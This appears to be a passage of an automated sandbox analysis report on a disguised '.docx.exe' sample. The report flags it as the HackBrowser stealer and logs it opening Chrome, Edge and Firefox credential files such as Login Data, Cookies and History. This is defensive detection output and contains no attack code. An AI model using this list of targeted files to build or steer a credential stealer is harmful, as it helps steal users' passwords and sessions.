Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected HackBrowser

Source: Yara match	File source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.2083812372.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe PID: 5952, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable	Jump to behavior
